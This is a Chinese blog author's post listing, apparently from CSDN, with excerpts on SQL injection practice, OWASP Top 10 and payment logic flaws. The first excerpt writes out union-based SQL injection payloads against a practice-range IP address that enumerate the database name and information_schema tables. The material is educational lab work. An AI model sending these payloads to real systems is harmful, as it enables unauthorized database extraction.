安全
whiteso
这个作者很懒,什么都没留下…
展开
-
sql注入实战(一)
实例靶场 http://59.63.200.79:8003/http://59.63.200.79:8003/?id=1 and 1=1 order by 3http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database()http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_sc原创 2021-01-19 22:40:40 · 768 阅读 · 0 评论 -
SQL注入
SQL注入总结一:https://blog.csdn.net/qq_43233085/article/details/103074395SQL注入总结二:https://blog.csdn.net/qq_43233085/article/details/103074738原创 2021-01-19 16:42:49 · 176 阅读 · 1 评论 -
OWAPS TOP 10
1、注入简单来说,注入往往是应用程序缺少对输入进行安全型检查所引起的,攻击者把一些包含指令的数据发送给解释器,解释器会把收到的数据转换成指令执行。常见的注入包括sql注入,--os-shell,LDAP(轻量目录访问协议),xpath(XPath即为XML路径语言,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言),HQL注入等。危害如下:注入可以导致数据丢失或被破坏,缺乏可审计性或拒绝服务。注入漏洞有时甚至可导致完全接管主机如何防范:1.使用安全的API,避免使用解释器原创 2021-01-18 23:40:30 · 619 阅读 · 0 评论 -
安全思路
逻辑支付漏洞骚操作案例集合:https://www.cnblogs.com/yufusec/p/9165661.html原创 2021-01-18 10:07:40 · 116 阅读 · 0 评论